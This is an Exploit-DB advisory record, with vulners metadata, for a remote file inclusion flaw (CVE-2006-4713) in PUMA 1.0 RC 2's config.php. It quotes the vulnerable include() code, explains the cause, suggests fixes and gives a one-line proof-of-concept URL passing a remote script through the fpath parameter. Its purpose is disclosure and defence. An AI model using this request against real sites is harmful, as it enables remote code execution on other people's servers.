ID EDB-ID:2340
Type exploitdb
Reporter Philipp Niedziela
Modified 2006-09-10T00:00:00
Description
PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability. CVE-2006-4713. Webapps exploit for php platform
+--------------------------------------------------------------------
+
+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.php)_RFI.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: PUMA 1.0 RC 2
+ Vendor ............: http://php.psywerx.net/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Affected File:
+ /config.php
+
+ Code:
+ .....
+ // Select language
+ $lang = "lang_english.php";
+ include($fpath."./language/$lang");
+ .....
+
+--------------------------------------------------------------------
+
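+ $fpath is not properly sanitized before being used: the excerpt above
+ passes it straight to include(), and config.php apparently never assigns
+ it a value of its own. Where PHP turns request parameters into global
+ variables (e.g. register_globals enabled), the request therefore decides
+ which file is included.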
+
+--------------------------------------------------------------------
+
+ Solution:
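+ -> Declare $fpath! (assign it a fixed, server-side value in config.php
+    before the include() call, so a request parameter cannot supply it)
+ -> Deny direct access to config.php
+ -> or modify code (this guard only rejects requests that carry an fpath
+    parameter; initialising $fpath remains the more robust fix):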
+
+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&
!isset($_POST['fpath'])){
+ //code of org. config.php
+ }
+ else {
+ echo "You cannot access this file directly.";
+ die();
+ }
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/config.php?fpath=[script]
+
+--------------------------------------------------------------------
+
+ Greets and Thanks: /str0ke
+
+-------------------------[ E O F ]----------------------------------
# milw0rm.com [2006-09-10]
{"id": "EDB-ID:2340", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PUMA <= 1.0 RC 2 config.php Remote File Include Vulnerability", "description": "PUMA <= 1.0 RC 2 (config.php) Remote File Include Vulnerability. CVE-2006-4713. Webapps exploit for php platform", "published": "2006-09-10T00:00:00", "modified": "2006-09-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2340/", "reporter": "Philipp Niedziela", "references": [], "cvelist": ["CVE-2006-4713"], "lastseen": "2016-01-31T16:02:52", "viewCount": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-01-31T16:02:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4713"]}, {"type": "osvdb", "idList": ["OSVDB:30810"]}], "modified": "2016-01-31T16:02:52", "rev": 2}, "vulnersScore": 7.5}, "sourceHref": "https://www.exploit-db.com/download/2340/", "sourceData": "+--------------------------------------------------------------------\n+\n+ PUMA 1.0 RC 2 (config.php) Remote File Inclusion\n+\n+ Original advisory:\n+ http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.php)_R FI.htm\n+\n+--------------------------------------------------------------------\n+\n+ Affected Software .: PUMA 1.0 RC 2\n+ Venedor ...........: http://php.psywerx.net/\n+ Class .............: Remote File Inclusion\n+ Risk ..............: high (Remote File Execution)\n+ Found by ..........: Philipp Niedziela\n+ Contact ...........: webmaster[at]bb-pcsecurity[.]de\n+\n+--------------------------------------------------------------------\n+\n+ Affected File:\n+ /config.php\n+\n+ Code:\n+ .....\n+ // Select language\n+ $lang = \"lang_english.php\";\n+ include($fpath.\"./language/$lang\");\n+ .....\n+\n+--------------------------------------------------------------------\n+\n+ $fpath is not properly sanitized before being 
used\n+\n+--------------------------------------------------------------------\n+\n+ Solution:\n+ -> Declare $fpath!\n+ -> Deny direct access to config.php\n+ -> or modify code:\n+\n+ if(!isset($_REQUEST['fpath']) && !isset($_GET['fpath']) &&\n!isset($_POST['fpath'])){\n+ //code of org. config.php\n+ }\n+ else {\n+ echo \"You cannot access this file directly.\";\n+ die();\n+ }\n+\n+--------------------------------------------------------------------\n+\n+ PoC:\n+\n+ http://[target]/config.php?fpath=[script]\n+\n+--------------------------------------------------------------------\n+\n+ Greets and Thanks: /str0ke\n+\n+-------------------------[ E O F ]----------------------------------\n\n# milw0rm.com [2006-09-10]\n", "osvdbidlist": ["30810"]}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "PHP remote file inclusion vulnerability in config.php in PSYWERKS PUMA 1.0 RC2 allows remote attackers to execute arbitrary PHP code via a URL in the fpath parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-12T16:07:00", "title": "CVE-2006-4713", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4713"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/a:psywerks:puma:1.0_rc2"], "id": "CVE-2006-4713", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4713", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:psywerks:puma:1.0_rc2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "cvelist": ["CVE-2006-4713"], "description": "# No description provided by the source\n\n## References:\nVendor URL: http://php.psywerx.net/\nOther Advisory URL: http://www.bb-pcsecurity.de/Websecurity/415/org/PUMA_1.0_RC_2_(config.php)_RFI.htm\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0156.html\nISS X-Force ID: 28837\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2340\nFrSIRT Advisory: ADV-2006-3545\n[CVE-2006-4713](https://vulners.com/cve/CVE-2006-4713)\nBugtraq ID: 19940\n", "edition": 1, "modified": "2006-09-10T18:45:34", "published": "2006-09-10T18:45:34", "href": "https://vulners.com/osvdb/OSVDB:30810", "id": "OSVDB:30810", "title": "PUMA config.php fpath Variable Remote File 
Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}